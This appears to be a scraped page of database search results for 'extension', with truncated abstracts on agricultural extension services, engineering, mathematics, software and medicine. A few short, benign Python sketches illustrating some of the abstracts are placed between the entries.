Extension education. Science.gov (United States) 2010-01-01 ..., written scripts, or interpreters. Recipients need not provide individually prescribed devices, readers for... Education § 15b.27 Extension education. (a) General. A recipient to which this subpart applies that provides extension education may not, on the basis of handicap, exclude qualified handicapped persons. A recipient... 9. Creating Teams Increases Extension Educator Productivity Science.gov (United States) Chalker-Scott, Linda; Daniels, Catherine H.; Martini, Nicole 2016-01-01 The Garden Team at Washington State University is a transdisciplinary group of faculty, staff, and students with expertise in applied plant and soil sciences and an interest in Extension education. The team's primary mission is to create current, relevant, and peer-reviewed materials as Extension publications for home gardeners. The average yearly… 10. 
Extension Sustainability Camp: Design, Implementation, and Evaluation Science.gov (United States) Brain, Roslynn; Upton, Sally; Tingey, Brett 2015-01-01 Sustainability Camps provide an opportunity for Extension educators to be in the forefront of sustainability outreach and to meet the growing demand for sustainability education. This article shares development, implementation, and evaluation of an Extension Sustainability Camp for youth, grades 4-6. Camp impact was measured via daily pre-and… 11. Agricultural extension officers' perceptions of integrated pest ... African Journals Online (AJOL) On the basis of the positive perceptions of the extension officers regarding IPM, the government of Kenya should establish a supportive policy that will enable the extension officers to promote and educate farmers on the various IPM practices. International Journal of Agriculture and Rural Development Vol. 7(2) 2006: 125- ... 12. Effective Use of Facebook for Extension Professionals Science.gov (United States) Mains, Mark; Jenkins-Howard, Brooke; Stephenson, Laura 2013-01-01 As the use of social media increases, Extension is challenged to stay relevant with cliental by using digital tools. This article illustrates how Facebook can be part of Extension's repertoire of methods for communication, program implementation, education, and marketing. This allows professionals to build social networking capacity with… 13. Linkage activities amongst researchers, extension agents, farmers ... African Journals Online (AJOL) This paper examined the research- extension- farmer- input dealer and marketer linkage activities in the North West Province of South Africa. A simple random sampling technique was used to select researchers, extension agents, farmers, agricultural input dealers and marketers. Their responses in linkage activities were ... 14. Communication for Strengthening Agricultural Extension and Rural ... African Journals Online (AJOL) chrischisoni estate sub-sector, which accounts for less than 30% of gross domestic product. The smallholder agricultural sector .... d) extension agents' views on the decentralization process; and e) assess extension workers' access to .... consistency or unanimity of agreement that the gap is real and needs to be closed. From the table,. 15. 10 CFR 905.33 - Extension formula. Science.gov (United States) 2010-01-01 ... 10 Energy 4 2010-01-01 2010-01-01 false Extension formula. 905.33 Section 905.33 Energy DEPARTMENT OF ENERGY ENERGY PLANNING AND MANAGEMENT PROGRAM Power Marketing Initiative § 905.33 Extension... × project-specific percentage × marketable resource determined to be available at the time future resource... 16. agricultural research and extension linkage in ethiopia African Journals Online (AJOL) AUA aimed at strengthening research and extension linkages will differ from country to country depending on historical working relationships between research and extension organisations as well as their organizational structures, responsiveness to the ever- growing challenges and how divergent or convergent their goals are ... 17. Agricultural extension, research, and development for increased ... African Journals Online (AJOL) The challenges of food security and agricultural development in South Africa cannot simply be solved by limiting extension and research development to the public sector. However, if shortcomings arise in the public sector while addressing extension, research and development, the potential involvement of the private sector ... 18. 
Job satisfaction of extension agents towards innovation ... African Journals Online (AJOL) The study assessed job satisfaction of extension agents towards innovation dissemination to fish farmers in Lagos State, Nigeria. A simple random sampling technique was used to select 44 extension officers from which data were collected. A structured questionnaire consisting of 6 personal characteristics, 23 management ... 19. Beneficiary Perceptions of Gender Specific Extension Delivery ... African Journals Online (AJOL) Women play major roles in agricultural production although only an estimated 5 percent actually benefit from mainstream extension activities. The Gender Specific Extension Delivery Service was instituted to remedy this trend. This study was an attempt to document women beneficiaries' perceptions on the effectiveness of ... 20. Extension Service Delivery Of Agricultural Development ... African Journals Online (AJOL) The study was conducted to assess the extension service delivery within the Agricultural Development Programmes of Southwest Nigeria after the cessation of the World Bank funding between 1996 and 2013. Primary data were collected from 201 extension agents across 50% of the states in the area of study using ... 1. Extension through Partnerships: Research and Education Center Teams with County Extension to Deliver Programs Science.gov (United States) Mullahey, J. Jeffrey 2011-01-01 Budget reductions have severely affected resources available to deliver agriculture and natural resource Extension programs in Florida. University of Florida/Institute of Food and Agricultural Sciences delivers Extension programming through a unique partnership between research and education centers and county Extension. Science-based information… 2. Examining eXtension: Diffusion, Disruption, and Adoption among Iowa State University Extension and Outreach Professionals Science.gov (United States) Taylor, Cayla; Miller, Greg 2016-01-01 As eXtension unveils its new membership model, Iowa State University Extension and Outreach must determine how best to support professionals and clientele using the technology. This article reports on a study that used the diffusion of innovations and disruptive innovation theories to assess Iowa Extension professionals' adoption and perceptions… 3. The Brazilian Experience with Agroecological Extension: A Critical Analysis of Reform in a Pluralistic Extension System Science.gov (United States) Diesel, Vivien; Miná Dias, Marcelo 2016-01-01 Purpose: To analyze the Brazilian experience in designing and implementing a recent extension policy reform based on agroecology, and reflect on its wider theoretical implications for extension reform literature. Design/methodology/approach: Using a critical public analysis we characterize the evolution of Brazilian federal extension policy… 4. Extension versus Bending for Continuum Robots Directory of Open Access Journals (Sweden) George Grimes 2008-11-01 Full Text Available In this paper, we analyze the capabilities of a novel class of continuous-backbone ("continuum" robots. These robots are inspired by biological "trunks, and tentacles". However, the capabilities of established continuum robot designs, which feature controlled bending but not extension, fall short of those of their biological counterparts. In this paper, we argue that the addition of controlled extension provides dual and complementary functionality, and correspondingly enhanced performance, in continuum robots. 
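Before the concluding sentence of the continuum-robot abstract below, a minimal planar sketch can make the claim concrete. It uses the common constant-curvature segment model (an assumption of this sketch, not the paper's interval-based analysis): with bending alone the reachable tip positions form a curve, while adding controlled extension sweeps out a two-dimensional region.

```python
import numpy as np

def tip_position(kappa, length):
    """Tip of a planar constant-curvature arc of given curvature and arc length,
    starting at the origin and initially tangent to the x-axis."""
    if abs(kappa) < 1e-9:                       # straight configuration
        return np.array([length, 0.0])
    return np.array([np.sin(kappa * length) / kappa,
                     (1.0 - np.cos(kappa * length)) / kappa])

kappas = np.linspace(-np.pi, np.pi, 181)        # reachable curvatures (1/m)

# Bending only: arc length fixed at 1 m -> the tips trace a one-dimensional curve.
bend_only = np.array([tip_position(k, 1.0) for k in kappas])

# Bending plus extension: arc length varies from 0.5 m to 1.0 m -> a 2-D region.
lengths = np.linspace(0.5, 1.0, 26)
bend_and_extend = np.array([tip_position(k, L) for k in kappas for L in lengths])

print(bend_only.shape)        # (181, 2)  -> a curve of tip positions
print(bend_and_extend.shape)  # (4706, 2) -> samples filling an area
```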
We present an interval-based analysis to show how the inclusion of controllable extension significantly enhances the workspace and capabilities of continuum robots. 5. Generalized extensions and blocking factors for FITS Science.gov (United States) Grosbol, P.; Harten, R. H.; Greisen, E. W.; Wells, D. C. 1988-06-01 A general design for extending the Flexible Image Transport System (FITS) tape format is proposed. The present design is shown to preserve compatibility with existing FITS tapes and software (including the 'random groups'), while being general enough to permit a wide variety of new extension files to be designed in the future. Rules are given for the blocking of FITS logical records. The rules for the generalized extension of FITS ensure that extensions can be located and decoded by standard routines without interfering with each other. 6. Integrated Composite Rocket Nozzle Extension Project Data.gov (United States) National Aeronautics and Space Administration — ORBITEC proposes to develop and demonstrate an Integrated Composite Rocket Nozzle Extension (ICRNE) for use in rocket thrust chambers. The ICRNE will utilize an... 7. 40 CFR 52.2322 - Extensions. Science.gov (United States) 2010-07-01 ..., by authority delegated under section 188(d) of the Clean Air Act, as amended in 1990, extends for two... PROMULGATION OF IMPLEMENTATION PLANS (CONTINUED) Utah § 52.2322 Extensions. (a) The Administrator, by authority... 8. Fundamentally Flawed: Extension Administrative Practice (Part 1). Science.gov (United States) Patterson, Thomas F., Jr. 1997-01-01 Extension's current administrative techniques are based on the assumptions of classical management from the early 20th century. They are fundamentally flawed and inappropriate for the contemporary workplace. (SK) 9. ERP extension - Supply Chain Management (SCM) OpenAIRE Vasile LUPSE; Ovidiu COSMA 2006-01-01 This article presents an extension of a ERP (Enterprise Resource Planning), more precisely the Supply Chain Management (SCM), together with some personal considerations and contributions of the authors, regarding the presented concepts. 10. Extensive Reading: A Means of Reconciliation. Science.gov (United States) Kutiper, Karen 1983-01-01 Cites research suggesting that extensive reading is as effective as intensive reading in developing general reading ability and is more effective in promoting good attitudes among elementary and secondary school students toward reading. (MM) 11. Bandwidth extension of speech using perceptual criteria CERN Document Server Berisha, Visar; Liss, Julie 2013-01-01 Bandwidth extension of speech is used in the International Telecommunication Union G.729.1 standard in which the narrowband bitstream is combined with quantized high-band parameters. Although this system produces high-quality wideband speech, the additional bits used to represent the high band can be further reduced. In addition to the algorithm used in the G.729.1 standard, bandwidth extension methods based on spectrum prediction have also been proposed. Although these algorithms do not require additional bits, they perform poorly when the correlation between the low and the high band is weak. In this book, two wideband speech coding algorithms that rely on bandwidth extension are developed. The algorithms operate as wrappers around existing narrowband compression schemes. 
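The bandwidth-extension abstract continues below. As a generic illustration of what "generating the high band" can mean, here is a naive spectral-folding sketch in NumPy; it is not one of the book's perceptually motivated algorithms, and the high-band gain value is an arbitrary assumption.

```python
import numpy as np

def spectral_folding_bwe(x_nb, hb_gain=0.3):
    """Crude artificial bandwidth extension: zero-insertion upsampling by 2
    mirrors the narrowband spectrum into the empty upper band, and that
    mirrored image is reused, attenuated, as a synthetic high band."""
    x_up = np.zeros(2 * len(x_nb))
    x_up[::2] = x_nb                    # zero-stuffing images the spectrum
    spec = np.fft.rfft(x_up)
    cut = len(spec) // 2                # bin at the old Nyquist frequency
    low = spec.copy()
    low[cut:] = 0.0                     # original (low) band only
    high = spec - low                   # mirrored image = synthetic high band
    return np.fft.irfft(2.0 * low + hb_gain * high, n=len(x_up))

# A 1 kHz tone sampled at 8 kHz gains a folded partner at 7 kHz
# (mirrored about the old 4 kHz Nyquist) in the 16 kHz output.
fs = 8000
t = np.arange(fs) / fs
x_wb = spectral_folding_bwe(np.sin(2 * np.pi * 1000.0 * t))
print(x_wb.shape)                       # (16000,)
```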
More specifically, in these algorithms, the low band is encoded using an existing toll-quality narrowband system, whereas the high band is generated using the proposed extension techniques. The first method relies only on transmitted high-... 12. UVEAL MELANOMA EXTENSION TO THE OPTIC CHIASM. Science.gov (United States) Abdellatief, Amro; Pulido, Jose S; Bartley, George B; Salomao, Diva R; Quinn, Timothy A 2016-01-01 Case report describing a patient who developed intracranial extension of a uveal melanoma through the optic nerve. We reviewed the patient's medical history and images. A 41-year-old woman who was blind in one eye had a uveal melanoma that extended through the optic nerve into the optic chiasm and involved the hypophysis. The patient then developed metastasis. The patient developed uveal melanoma extension into the optic chiasm through the optic nerve resulting in a visual field defect in the fellow eye. Uveal melanoma extension through the optic nerve is a devastating complication, which occurs anywhere from 0.6% to 3.7% in patients with uveal melanoma. If enucleation of the affected eye is performed, a representative portion of the optic nerve should be excised to decrease the risk of extension. Patients with phthisical eyes should undergo appropriate imaging techniques to prevent a missed diagnosis of optic nerve involvement. 13. 76 FR 79665 - Agency Information Collection Extension Science.gov (United States) 2011-12-22 ... 1995. The information collection package requests a three-year extension of Industrial Relations... request contains: (1) OMB No. 1910-0600; (2) Information Collection Request Title: Industrial Relations... 14. ERP extension - Supply Chain Management (SCM Directory of Open Access Journals (Sweden) Vasile LUPSE 2006-01-01 Full Text Available This article presents an extension of a ERP (Enterprise Resource Planning, more precisely the Supply Chain Management (SCM, together with some personal considerations and contributions of the authors, regarding the presented concepts. 15. Offshore extension of Gomati river, Dwarka Digital Repository Service at National Institute of Oceanography (India) Vora, K.H.; Naik, D.K.; Ganesan, P.; Moraes, C. information. Attempts have been made to identify the submerged extension of Gomati River by diving inspection and based on the results obtained such as findings like stone and iron anchors, circular bastions, etc. While many features reported earlier... 16. Economic modeling for life extension decision making International Nuclear Information System (INIS) Farber, M.A.; Harrison, D.L.; Carlson, D.D. 1986-01-01 This paper presents a methodology for the economic and financial analysis of nuclear plant life extension under uncertainty and demonstrates its use in a case analysis. While the economic and financial evaluation of life extension does not require new analytical tools, such studies should be based on the following three premises. First, the methodology should examine effects at the level of the company or utility system, because the most important economic implications of life extension relate to the altered generation system expansion plan. Second, it should focus on the implications of uncertainty in order to understand the factors that most affect life extension benefits and identify risk management efforts. Third, the methodology should address multiple objectives, at a minimum, both economic and financial objectives 17. 
Integrated Composite Rocket Nozzle Extension, Phase I Data.gov (United States) National Aeronautics and Space Administration — ORBITEC proposes to develop and demonstrate an Integrated Composite Rocket Nozzle Extension (ICRNE) for use in rocket thrust chambers. The ICRNE will utilize an... 18. An Overview of English Extensive Reading Program OpenAIRE Fujikami , Ryuji; Nagasaka, Tatsuhiko Paul; Yoshino, Yasuko; Jones, Andrew 2013-01-01 In this paper, we review the changes in attitude toward reading English shown by students as a result of participating in an extensive reading program. The top classes for each department studying Integrated English in the first semester of 2012 were given the challenge of reading extensively in English, using simple readers from leading publishers. Before and after the program, the non-English majors were asked to answer a questionnaire designed to reveal their attitudes toward reading Engli... 19. Extension for prevention: is it relevant today? Science.gov (United States) Osborne, J W; Summitt, J B 1998-08-01 Extension for prevention has been an integral part of dentistry for over 100 years. Because this concept advocated the removal of sound tooth structure, it was not totally accepted at the turn of the century. The advent of the gold casting catapulted extension for prevention into general acceptance. In 1883, Webb presented a concept of "prevention of extension of decay". This concept advocated a proximal cavity preparation extending toward the buccal and lingual aspects of the tooth so that contact with adjacent teeth would not be at the margins. The separation of the margins, along with proper restoration contours, was thought to promote natural cleansing of the embrasures with saliva and fluids in the diet. GV Black's 1891 idea of "extension for prevention" was to provide extension of the preparation to the facial and lingual line angles in order to bring about "self-cleansing" margins via food excursion. Black's concept also included extending preparations through fissures to allow cavosurface margins to be on non-fissured enamel. Black integrated the extension of the proximal margins with his concept of an occlusal isthmus for a Class II amalgam preparation one-third the faciolingual width of the occlusal surface. Challenges to this concept of extension for prevention were immediate; and, by the 1950's, narrower, more conservative preparations were seen by a few as being more effective in preserving teeth. Not only occlusal width was reassessed, but the need to routinely extend proximal margins to the buccal and lingual line angles was also questioned. By the mid-1960's and early 1970's a more conservative approach to amalgam preparation was advocated and was being taught in some dental schools. Today, a standardized outline form should not be used or taught as a principle of cavity preparation. In areas where fissure caries has necessitated a preparation extending into dentin, a composite resin or dental amalgam restoration should be placed, and a fissure 20. Upper Stage Engine Composite Nozzle Extensions Science.gov (United States) Valentine, Peter G.; Allen, Lee R.; Gradl, Paul R.; Greene, Sandra E.; Sullivan, Brian J.; Weller, Leslie J.; Koenig, John R.; Cuneo, Jacques C.; Thompson, James; Brown, Aaron; 2015-01-01 Carbon-carbon (C-C) composite nozzle extensions are of interest for use on a variety of launch vehicle upper stage engines and in-space propulsion systems. 
The C-C nozzle extension technology and test capabilities being developed are intended to support National Aeronautics and Space Administration (NASA) and United States Air Force (USAF) requirements, as well as broader industry needs. Recent and on-going efforts at the Marshall Space Flight Center (MSFC) are aimed at both (a) further developing the technology and databases for nozzle extensions fabricated from specific CC materials, and (b) developing and demonstrating low-cost capabilities for testing composite nozzle extensions. At present, materials development work is concentrating on developing a database for lyocell-based C-C that can be used for upper stage engine nozzle extension design, modeling, and analysis efforts. Lyocell-based C-C behaves in a manner similar to rayon-based CC, but does not have the environmental issues associated with the use of rayon. Future work will also further investigate technology and database gaps and needs for more-established polyacrylonitrile- (PAN-) based C-C's. As a low-cost means of being able to rapidly test and screen nozzle extension materials and structures, MSFC has recently established and demonstrated a test rig at MSFC's Test Stand (TS) 115 for testing subscale nozzle extensions with 3.5-inch inside diameters at the attachment plane. Test durations of up to 120 seconds have been demonstrated using oxygen/hydrogen propellants. Other propellant combinations, including the use of hydrocarbon fuels, can be used if desired. Another test capability being developed will allow the testing of larger nozzle extensions (13.5- inch inside diameters at the attachment plane) in environments more similar to those of actual oxygen/hydrogen upper stage engines. Two C-C nozzle extensions (one lyocell-based, one PAN-based) have been fabricated for testing with the larger 1. How to make agricultural extension demand-driven?: The case of India's agricultural extension policy OpenAIRE Birner, Regina; Anderson, Jock R. 2007-01-01 "Many countries have recognized the need to revive agricultural advisory or extension services (the terms are used interchangeably here) as a means of using agriculture as an engine of pro-poor growth; reaching marginalized, poor, and female farmers; and addressing new challenges, such as environmental degradation and climate change. In spite of ample experience with extension reform worldwide, identifying the reform options most likely to make extension more demand-driven remains a major cha... 2. abc: An extensible AspectJ compiler DEFF Research Database (Denmark) Avgustinov, Pavel; Christensen, Aske Simon; Hendren, Laurie 2005-01-01 Research in the design of aspect-oriented programming languages requires a workbench that facilitates easy experimentation with new language features and implementation techniques. In particular, new features for AspectJ have been proposed that require extensions in many dimensions: syntax, type...... checking and code generation, as well as data flow and control flow analyses. The AspectBench Compiler (abc) is an implementation of such a workbench. The base version of abc implements the full AspectJ language. Its frontend is built, using the Polyglot framework, as a modular extension of the Java...... language. The use of Polyglot gives flexibility of syntax and type checking. The backend is built using the Soot framework, to give modular code generation and analyses. In this paper, we outline the design of abc, focusing mostly on how the design supports extensibility. 
We then provide a general overview... 3. Supersymmetric extension of the Snyder algebra Energy Technology Data Exchange (ETDEWEB) Gouba, L., E-mail: [email protected] [Abdus Salam International Centre for Theoretical Physics (ICTP), Strada Costiera 11, 34014 Trieste (Italy); Stern, A., E-mail: [email protected] [Dept. of Physics and Astronomy, Univ. of Alabama, Tuscaloosa, Al 35487 (United States) 2012-04-11 We obtain a minimal supersymmetric extension of the Snyder algebra and study its representations. The construction differs from the general approach given in Hatsuda and Siegel ( (arXiv:hep-th/0311002)) and does not utilize super-de Sitter groups. The spectra of the position operators are discrete, implying a lattice description of space, and the lattice is compatible with supersymmetry transformations. -- Highlights: Black-Right-Pointing-Pointer A new supersymmetric extension of the Snyder algebra is constructed. Black-Right-Pointing-Pointer The extension is minimal and the construction does not involve supersymmetric de Sitter algebras. Black-Right-Pointing-Pointer An involution is defined for the system and discrete representations are constructed. Black-Right-Pointing-Pointer The representations imply a spatial lattice and the lattice spacing is half that of the bosonic case. Black-Right-Pointing-Pointer A differential operator representation is given for fields on super-momentum space. 4. Timeability in Extensive-Form Games DEFF Research Database (Denmark) Jakobsen, Sune K.; Sørensen, Troels Bjerre; Conitzer, Vincent 2016-01-01 Extensive-form games constitute the standard representation scheme for games with a temporal component. But do all extensive-form games correspond to protocols that we can implement in the real world? We often rule out games with imperfect recall, which prescribe that an agent forget something...... that she knew before. In this paper, we show that even some games with perfect recall can be problematic to implement. Specifically, we show that if the agents have a sense of time passing (say, access to a clock), then some extensive-form games can no longer be implemented; no matter how we attempt...... to time the game, some information will leak to the agents that they are not supposed to have. We say such a game is not exactly timeable. We provide easy-to-check necessary and sufficient conditions for a game to be exactly timeable. Most of the technical depth of the paper concerns how to approximately... 5. Symmetric Functional Model for Extensions of Hermitian CERN Document Server Ryzhov, V 2006-01-01 This paper offers the functional model of a class of non-selfadjoint extensions of a Hermitian operator with equal deficiency indices. The explicit form of dilation of a dissipative extension is offered and the symmetric form of Sz.Nagy-Foia\\c{s} model as developed by B.~Pavlov is constructed. A variant of functional model for a general non-selfadjoint non-dissipative extension is formulated. We illustrate the theory by two examples: singular perturbations of the Laplace operator in~$L_2(\\Real^3)$ by a finite number of point interactions, and the Schr\\"odinger operator on the half axis~$(0, \\infty)$ in the Weyl limit circle case at infinity. 6. Bayesian optimization for computationally extensive probability distributions. Science.gov (United States) Tamura, Ryo; Hukushima, Koji 2018-01-01 An efficient method for finding a better maximizer of computationally extensive probability distributions is proposed on the basis of a Bayesian optimization technique. 
A key idea of the proposed method is to use extreme values of acquisition functions obtained by Gaussian processes for the next training phase, which should be located near a local maximum or a global maximum of the probability distribution. Our Bayesian optimization technique is applied to the posterior distribution in effective physical model estimation, which is a computationally extensive probability distribution. Even when the number of sampling points on the posterior distribution is fixed to be small, the Bayesian optimization provides a better maximizer of the posterior distribution than the random search method, the steepest descent method, or the Monte Carlo method. Furthermore, the Bayesian optimization improves the results efficiently when combined with the steepest descent method, and it is thus a powerful tool for searching for a better maximizer of computationally extensive probability distributions.
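A minimal one-dimensional sketch of that idea follows (not the authors' implementation): a Gaussian-process surrogate is fitted to a handful of evaluations of an invented test density, and each new evaluation point is taken at the extreme value of an expected-improvement acquisition function. The RBF kernel, its length scale and the test function are assumptions made purely for illustration.

```python
import numpy as np
from scipy.stats import norm

rng = np.random.default_rng(1)

def target(x):
    """Stand-in for an expensive-to-evaluate probability density."""
    return np.exp(-0.5 * (x - 2.0) ** 2) + 0.5 * np.exp(-2.0 * (x + 1.0) ** 2)

def rbf(a, b, length=0.7):
    return np.exp(-0.5 * ((a[:, None] - b[None, :]) / length) ** 2)

def gp_posterior(x_train, y_train, x_query, jitter=1e-6):
    """Posterior mean and standard deviation of a zero-mean GP surrogate."""
    K_inv = np.linalg.inv(rbf(x_train, x_train) + jitter * np.eye(len(x_train)))
    K_s = rbf(x_query, x_train)
    mean = K_s @ K_inv @ y_train
    var = 1.0 - np.sum(K_s @ K_inv * K_s, axis=1)
    return mean, np.sqrt(np.clip(var, 1e-12, None))

x_train = rng.uniform(-4.0, 4.0, size=3)     # a few initial evaluations
y_train = target(x_train)
grid = np.linspace(-4.0, 4.0, 400)

for _ in range(10):
    mean, std = gp_posterior(x_train, y_train, grid)
    z = (mean - y_train.max()) / std
    ei = (mean - y_train.max()) * norm.cdf(z) + std * norm.pdf(z)
    x_next = grid[np.argmax(ei)]             # extreme value of the acquisition
    x_train = np.append(x_train, x_next)
    y_train = np.append(y_train, target(x_next))

print("estimated maximizer:", x_train[np.argmax(y_train)])   # close to 2.0
```

Because each new point is placed where the surrogate expects the largest improvement, far fewer evaluations of the expensive density are needed than with random search.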
7. A novel decision diagrams extension method International Nuclear Information System (INIS) Li, Shumin; Si, Shubin; Dui, Hongyan; Cai, Zhiqiang; Sun, Shudong 2014-01-01 Binary decision diagram (BDD) is a graph-based representation of Boolean functions. It is a directed acyclic graph (DAG) based on Shannon's decomposition. Multi-state multi-valued decision diagram (MMDD) is a natural extension of BDD for the symbolic representation and manipulation of multi-valued logic functions. This paper proposes a decision diagram extension method that builds on an original BDD/MMDD when the scale of a reliability system is extended. Following a discussion of the decomposition and physical meaning of BDD and MMDD, the modeling method for a BDD/MMDD based on an original BDD/MMDD is introduced. Three case studies are implemented to demonstrate the presented methods. Compared with traditional BDD and MMDD generation methods, the decision diagram extension method is more computationally efficient, as shown through the running time
8. On Central Extensions of Associative Dialgebras Science.gov (United States) Rakhimov, Isamiddin S. 2016-03-01 The concept of central extensions plays an important role in constructing extensions of algebras. This technique has been successfully used in the classification problem for certain classes of algebras. In 1978 Skjelbred and Sund reduced the classification of nilpotent Lie algebras in a given dimension to the study of orbits under the action of the automorphism group on the space of second-degree cohomology of a smaller Lie algebra with coefficients in a trivial module. Then W. de Graaf applied the Skjelbred and Sund method to the classification problem of low-dimensional nilpotent Lie and associative algebras over some fields. The main purpose of this note is to establish elementary properties of central extensions of associative dialgebras and apply the above-mentioned method to the classification of low-dimensional nilpotent associative dialgebras.
9. Prospective of the agricultural extension in Colombia International Nuclear Information System (INIS) David Hinestrosa, A. 1998-01-01 The expected situation of agricultural extension over the next twenty years is described, together with regional programs of research and technology transfer based on the rational use of natural resources, the exploitation of markets, prior evaluation and expert systems. It envisages the dynamic participation of producer leaders and their operation within a framework of decentralization, privatization, sustainability, competitiveness, equity, strengthening and rural significance. Rural extension is assumed to be functional and linked to processes of research, transfer, development, technological development and markets. Institutionally, extension is expected to be a regional, privately delivered service with a timely and sufficient allocation of resources for improving the quality of the rural population's life.
10. Extensive keloidal healing of pemphigus vulgaris Directory of Open Access Journals (Sweden) Khanna Neena 1997-01-01 Bullae of pemphigus vulgaris heal without scarring. We report here a patient with pemphigus vulgaris who presented with a one-month history of extensive flaccid bullae and uninfected erosions on the trunk and extremities, along with superficial erosions in the oral mucosa. The clinical suspicion of pemphigus vulgaris was confirmed by histopathological and immunohistological examination. Pulse therapy with monthly parenteral dexamethasone and cyclophosphamide was instituted. On healing, the cutaneous lesions formed extensive keloidal scars despite the high-dose monthly corticosteroid therapy.
11. Extension of the nuclear power plant lifetime International Nuclear Information System (INIS) Keramsi, Alain 2011-01-01 After a presentation of the French nuclear context (history of the reactor fleet, choice of reactor type, PWR operating principle, competitiveness, environmental performance), this PowerPoint presentation addresses the context and challenges of operating lifetime (average fleet age in different countries, examples of extensions, the case of the United States, what is at stake with lifetime extension, decennial inspections, EDF strategy), discusses EDF's safety objectives (definition of the three main safety functions, impact of operating duration and of the coexistence of two generations for the safety functions), and discusses how to manage the ageing phenomenon for replaceable and non-replaceable components.
12. On loop extensions and cohomology of loops OpenAIRE Benítez, Rolando Jiménez; Meléndez, Quitzeh Morales 2015-01-01 This paper defines cohomology-like groups that classify loop extensions satisfying a given identity: in three variables for association identities, and in two variables for the case of commutativity. A large number of identities is considered. These groups generalize those defined in the works of Nishigori [2] and of Jhonson and Leedham-Green [4]. The number of metacyclic extensions for the trivial action of the quotient on the kernel is computed in one particular case for left Bol loops a...
13. Mathematics for common entrance three (extension) answers CERN Document Server Alexander, Serena 2015-01-01 This book contains answers to all exercises featured in the accompanying textbook Mathematics for Common Entrance Three (Extension), which provides essential preparation for Level 3 of the ISEB 13+ Mathematics exam, as well as for CASE and other scholarship exams. - Clean, clear layout for easy marking. - Includes examples of high-scoring answers with diagrams and workings. Also available to purchase from the Galore Park website www.galorepark.co.uk: - Mathematics for Common Entrance Three (Extension). - Mathematics for Common Entrance One. - Mathematics for Common Entrance One Answers. - M 14.
Global Approaches to Extension Practice: A Journal of Agricultural ... African Journals Online (AJOL) Global Approaches to Extension Practice (GAEP), A publication of the Department of Agricultural Extension, Federal University of Technology, Owerri, Imo State, Nigeria is an international journal which considers articles from all areas of Agricultural Extension: rural sociology, environmental extension, extension ... 15. Software extension and integration with type classes DEFF Research Database (Denmark) Lämmel, Ralf; Ostermann, Klaus 2006-01-01 expressiveness, by using the language concept of \\emph{type classes}, as it is available in the functional programming language Haskell. A detailed comparison with related work shows that type classes provide a powerful framework in which solutions to known software extension and integration problems can...... be provided. We also pinpoint several limitations of type classes in this context.... Science.gov (United States) Park, Jeongyeon 2016-01-01 This study explores whether an extensive reading (ER) approach can enhance L2 learners' writing performance in an English for Academic Purposes context. Two classes were compared in terms of writing improvement after one semester: a 'traditional' writing class primarily focused on writing practice and grammar instruction, and an ER class in which… 17. Design Extension in Post Fukushima Scenario International Nuclear Information System (INIS) Kumar, Prabhat 2013-01-01 Post Fukushima Flooding Review and Design Extension: • Increased tsunami height; • Increased tsunami wall;• Increased size of storm water drains; • Non return gates in storm water drains; • Wall around fore bay and sea water pump house; • Sealing of NIB penetrations for a higher tsunami; • Alternative approach road; • NICB elevation; • Perpendicular to coast line 18. On an extension of a combinatorial identity On an extension of a combinatorial identity. M RANA and A K AGARWAL. Center for Advanced Study in Mathematics, Panjab University, Chandigarh 160 014,. India. E-mail: [email protected]. MS received 22 August 2007. Abstract. Using Frobenius partitions we extend the main results of [4]. This leads to an infinite family of ... 19. Equivalence relations of AF-algebra extensions In this paper, we consider equivalence relations of *-algebra extensions and describe the relationship between the isomorphism equivalence and the unitary equivalence. We also show that a certain group homomorphism is the obstruction for these equivalence relations to be the same. 20. newspapers' agricultural agenda setting and extension agents ... African Journals Online (AJOL) p2333147 issue 'agendas' there is need, as asserted by McQuail (1987:75) for a combination of content analysis showing media attention to different issues in the relevant period and some indication of relevant media used by the public concerned, in this study, the extension agents. Agenda-setting according to Davis and Robinson ... 1. Seroprevalence Study Of Bovine Brucellosis In Extensive ... African Journals Online (AJOL) The prevalence of bovine brucellosis was measured in cross sectional study in Jimma zone, Western Ethiopia using Rose Bengal Plate Test (RBT) and CFT from October 2003 to April 2004. The study animals consisted of 1305 local breed found in extensive system in five districts of in the zone. The overall individual animal ... 2. 
Obstructions to Clifford system extensions of algebras Springer Verlag Heidelberg The problem of Clifford system extensions resides in the classification and the construction ... The construction of T( ) is closely analogous to a construction by Kanzaki [9]; for a description of the Chase-Harrison-Rosenberg seven-term exact sequence [2] about the Brauer group ... Cliff_k(G, R; ) = χ^{-1}( ), the fiber of χ over ...
3. FISHERIES EXTENSION SERVICES IN OGUN STATE | Olopade ... African Journals Online (AJOL) The study attempts to assess the current trends, impact and constraints of fisheries extension services to artisanal fishers in Ogun Waterside Local Government Area of Ogun State. The survey approach was used to generate the needed data using 120 structured questionnaires. Simple statistical techniques such as means ...
4. FISHERIES EXTENSION ACTIVITIES AMONG WOMEN IN EPE ... African Journals Online (AJOL) The study focuses on fisheries extension activities among women in Epe Local Government Area of Lagos State. A total of 106 questionnaires were obtained from 120 randomly administered questionnaires. The results show that the majority of the women are sole owners of the businesses and they obtained fishing skills from their ...
5. Journal of Environmental Extension: Editorial Policies African Journals Online (AJOL) Focus and Scope. The Journal of Environmental Extension is to be published annually to generate ideas on the formulation, packaging, dissemination and consequential impacts of ideas/policies relating to the quality and sustainability of the environment. The focus of the Journal is on: Health, Agriculture, Technology
6. ANTLR Tree Grammar Generator and Extensions Science.gov (United States) Craymer, Loring 2005-01-01 A computer program implements two extensions of ANTLR (Another Tool for Language Recognition), which is a set of software tools for translating source code between different computing languages. ANTLR supports predicated-LL(k) lexer and parser grammars, a notation for annotating parser grammars to direct tree construction, and predicated tree grammars. [LL(k) signifies left-to-right, leftmost derivation with k tokens of look-ahead, referring to certain characteristics of a grammar.] One of the extensions is a syntax for tree transformations. The other extension is the generation of tree grammars from annotated parser or input tree grammars. These extensions can simplify the process of generating source-to-source language translators and make possible an approach, called "polyphase parsing," to translation between computing languages. The typical approach to translator development is to identify high-level semantic constructs such as "expressions," "declarations," and "definitions" as fundamental building blocks in the grammar specification used for language recognition. The polyphase approach is to lump ambiguous syntactic constructs together during parsing and then disambiguate the alternatives in subsequent tree transformation passes. Polyphase parsing is believed to be useful for generating efficient recognizers for C++ and other languages that, like C++, have significant ambiguities.
7. Effectively Communicating Science to Extension Audiences Science.gov (United States) Robinson, Patrick 2013-01-01 This article discusses the concept of "framing" within the context of relevant communication and psychological research and considers its potential applicability to Extension science communication.
